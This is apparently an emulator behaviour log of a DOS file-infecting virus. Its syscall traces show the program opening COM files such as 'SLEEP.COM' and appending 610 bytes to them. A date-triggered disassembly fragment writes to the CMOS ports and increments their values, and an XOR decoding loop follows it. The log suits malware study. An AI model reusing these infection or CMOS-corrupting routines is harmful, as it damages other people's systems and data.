2018-12-25T12:43:32.827315208Z 62 PC: 13f1e | Close file
2018-12-25T12:43:32.836147302Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:32.839017482Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.840057682Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.846478985Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.85340345Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.859423208Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.860520884Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.863345303Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.864980992Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.865979974Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.871053042Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.878707893Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.880654113Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.8888493Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.891342078Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.892394306Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.902631362Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.908930454Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.914907669Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.91646487Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.919081246Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.921486254Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.923160679Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.924424794Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.932228414Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.935030832Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.942780211Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.945066663Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.946571824Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.95597737Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.963171481Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.970079571Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.971419301Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.973881996Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.976344494Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.977832903Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.978958377Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.986686943Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.988626206Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.996237194Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.99874303Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.999778188Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.009141952Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.015803603Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.022298682Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.023469642Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.026105513Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.029789381Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.031372411Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.03291632Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.041722192Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.044048134Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.051921318Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.055475572Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.057391934Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.067338666Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.075493097Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.081652827Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.082861992Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.0861467Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.089521622Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.091154483Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.094123182Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.101307254Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.103328598Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.11330008Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.115867254Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.117109829Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.128096652Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.135125489Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.141421231Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.143707024Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.146313941Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.149170292Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.15136396Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.153391355Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.161573531Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.164245262Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.173307408Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.176200411Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.177883052Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.188295993Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.194754644Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:33.197487809Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.200058761Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.202410063Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:33.203721125Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:33.205661131Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:33.211306371Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:33.219999884Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.222265712Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.019502487Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.027017915Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.033871023Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.035549169Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.038439296Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.042101561Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.043402738Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.044678951Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.051724567Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.053748896Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.063765894Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.067783194Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.06955681Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.078778674Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.08617302Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.092795493Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.094599935Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.097810756Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.099341055Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.101922906Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.105280243Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.106774912Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.10807331Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.116115438Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.118743959Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.125697958Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.129794132Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.131289693Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.140533134Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.148024144Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.15400585Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.155589719Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.158722867Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.160960307Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.163411855Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.166768749Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.168106509Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.169328188Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.176672127Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.178805957Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.185604328Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.19233184Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.193624595Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.202795421Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.209639889Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.21544399Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.217071215Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.219743693Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.221917282Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.224574321Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.227516825Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.229752945Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.231971857Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.239423737Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.246229737Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.25323895Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.259247211Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.261162658Z 42 PC: 13ff4 | Get date
0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:32.784723062Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:32.790308505Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:32.791674307Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:33.167126919Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:33.180645534Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:33.188590535Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:33.1899746Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:33.192671769Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:33.20539096Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:33.206892855Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:33.208382777Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:33.217740503Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:33.220471847Z 62 PC: 13f1e | Close file
2018-12-25T12:43:33.229826582Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:33.233571834Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.235232204Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.246236632Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.255384002Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.263147157Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.26487452Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.268334473Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.271085619Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.272306842Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.273716536Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.279175864Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.280680816Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.286394189Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.288518665Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.28945049Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.295653377Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.303062948Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.310239985Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.311668931Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.315820131Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.318472772Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.319861876Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.321586889Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.330119312Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.332404049Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.341715861Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.344515389Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.345638756Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.356493811Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.373068299Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.380519677Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.382406414Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.385279924Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.388356604Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.390684071Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.39220574Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.401066655Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.403184789Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.412704159Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.415785661Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.417285775Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.428109712Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.435311487Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.442571636Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.444932214Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.447908205Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.451005991Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.453444207Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.455182332Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.463990682Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.467126848Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.476700254Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.479756243Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.482015514Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.492894489Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.500607825Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.508653615Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.511548495Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.514639644Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.517613969Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.520008675Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.522387628Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.532430637Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.536676274Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.545939522Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.548900668Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.551361098Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.56266985Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.570143934Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.578179858Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.579869192Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.583115391Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.587377141Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.589306675Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.59123919Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.603121802Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.605643549Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.614411318Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.61804053Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.619331283Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.629859229Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.637507444Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:33.644875877Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.64677893Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.650103274Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:33.651369349Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:33.652914984Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:33.659292207Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:33.668772492Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.670428676Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.01451615Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.024118162Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.030696007Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.032417347Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.036691801Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.039888799Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.041579207Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.044445721Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.052826733Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.055435623Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.064542454Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.068499245Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.070357825Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.081518691Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.090135497Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.096356003Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.098090541Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.102118842Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.104125545Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.107626608Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.112127281Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.114207475Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.116263182Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.126959775Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.130268239Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.138857747Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.143741845Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.146122514Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.156850194Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.165048107Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.171124984Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.172707864Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.176662232Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.178192439Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.181225162Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.184690722Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.187000704Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.188577327Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.196841625Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.199488462Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.207711105Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.214944112Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.216192167Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.227764676Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.235363793Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.24180076Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.243098563Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.245596491Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.247025246Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.250704683Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.254112508Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.256839208Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.25867736Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.267242743Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.270772679Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.278684965Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.285421244Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.287883733Z 42 PC: 13ff4 | Get date
0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36
2018-12-25T12:43:34.290586667Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:43:34.296856507Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:33.080150489Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:33.094546966Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:33.09582847Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:33.123189824Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:33.130656113Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:33.136774399Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:33.138155016Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:33.142052123Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:33.144794348Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:33.146633103Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:33.148993931Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:33.158506939Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:33.161053776Z 62 PC: 13f1e | Close file
2018-12-25T12:43:33.16963498Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:33.172552726Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.174063222Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.184481863Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.191217767Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.197770521Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.201439113Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.204459586Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.207337053Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.20931691Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.211268535Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.219377354Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.221712696Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.2302576Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.233166846Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.235179028Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.456575607Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.460955449Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.465101802Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.466219832Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.467880732Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.469526755Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.470821735Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.471762287Z 64 PC: 13f05 | Write file or device (See above)
